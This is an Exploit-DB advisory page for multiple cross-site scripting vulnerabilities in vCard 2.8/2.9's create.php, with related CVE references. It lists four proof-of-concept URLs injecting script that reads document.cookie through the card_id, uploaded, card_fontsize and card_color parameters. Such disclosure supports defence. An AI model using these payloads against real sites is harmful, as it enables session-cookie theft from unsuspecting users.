Lucene search
Linux_DroxEDB-ID:27414HistoryMar 11, 2006 - 12:00 a.m.
vCard 2.8/2.9 - 'create.php' Multiple Cross-Site Scripting Vulnerabilities
2006-03-1100:00:00
Linux_Drox
www.exploit-db.com
17
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/17073/info
vCard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/vcard/create.php?card_id='><script>alert(document.cookie)</script>
http://www.example.com/vcard/create.php?uploaded='><script>alert(document.cookie)</script>
http://www.example.com/vcard/create.php?card_fontsize='><script>alert(document.cookie)</script>
http://www.example.com/vcard/create.php?card_color='><script>alert(document.cookie)</script>Related
prion
prion
Cross site scripting
2006-03-14 19:06:00
Cross site scripting
2006-06-05 17:02:00
cve
cve
CVE-2006-1230
2006-03-14 19:06:00
CVE-2006-2810
2006-06-05 17:02:00
cvelist
cvelist
CVE-2006-1230
2006-03-14 19:00:00
CVE-2006-2810
2006-06-05 17:00:00
nvd
nvd
CVE-2006-1230
2006-03-14 19:06:00
CVE-2006-2810
2006-06-05 17:02:00